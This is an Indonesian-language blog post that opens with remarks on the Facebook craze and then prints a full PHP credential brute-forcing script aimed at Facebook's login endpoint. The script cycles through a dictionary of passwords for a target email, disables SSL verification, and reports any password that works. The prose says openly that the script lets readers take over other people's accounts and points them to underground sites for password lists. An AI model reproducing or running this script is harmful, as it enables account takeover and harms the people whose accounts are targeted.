Yupz dunia ini sekarang sedang dilanda demam facebook, walaupun terkadang sebagian orang menganggap demam facebook cuma untuk mengikuti trend dan menganggap itu adalah suatu pembodohan massal, tapi menurut gw sah² saja setiap orang demam facebook daripada demam berdarah.
Mark Zuckerberg dengan facebook'a ternyata ga hanya menyita perhatian para remaja dan orang tua saja, di dunia maya ternyata para hacker or cracker pun ber-lomba² mencari cara untuk mengeksploit situs ini.
################################
# Face Book Brute Forcer
################################
set_time_limit(0);
$username ="brute@force.org"; // username to brute force
$dictionary ="dictionary.txt"; // need dictionary to password list
function kontrol($kullaniciadi,$sifre){
$useragent = "Opera/9.21 (Windows NT 5.1; U; tr)";
$data = "email=$kullaniciadi&pass=$sifre&login=Login" ;
$ch = curl_init('https://login.facebook.com/login.php?m&next=http://m.facebook.com/home.php');
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookie.txt');
curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookie.txt');
$source=curl_exec ($ch);
curl_close ($ch);
if(eregi("Home",$source)){return true;} else {return false;}
}
if(!is_file($dictionary)){echo "$dictionary is not file";exit;}
$lines=file($dictionary);
echo "Attack Starting..
";
sleep(10);
echo "Attack Started, brute forcing..
";
foreach($lines as $line){
$line=str_replace("\r","",$line);
$line=str_replace("\n","",$line);
if(kontrol($username,$line)){echo "[+] username:$username , password:$line - P
assword found : $line
";$fp=fopen('cookie.txt','w');fwrite($fp,'');exit;}
else{echo "[-] username:$username , password:$line - Password not found :
$line
";}
}
?>
Dengan hanya bermodalkan dictionary attack yg bisa lo buat dan kombinasikan sendiri atau bisa juga lo download di situs² underground para hacker, dan sebuah script PHP diatas dengan cara kerja'a menggunakan metode lama brute force, memungkinkan lo untuk mengambil alih account orang lain.
Yupz, brute force methode adalah teknik yg paling banyak digunakan untuk memecahkan password saat ini, cara kerja metode ini sangat sederhana, yaitu mencoba semua kombinasi yg mungkin. Semakin banyak kombinasi angka, kata, dan huruf pada dictionary attack lo, maka makin besar persentasi lo untuk memecahkan password.
special thank to v3nom
trim's
Ardhiva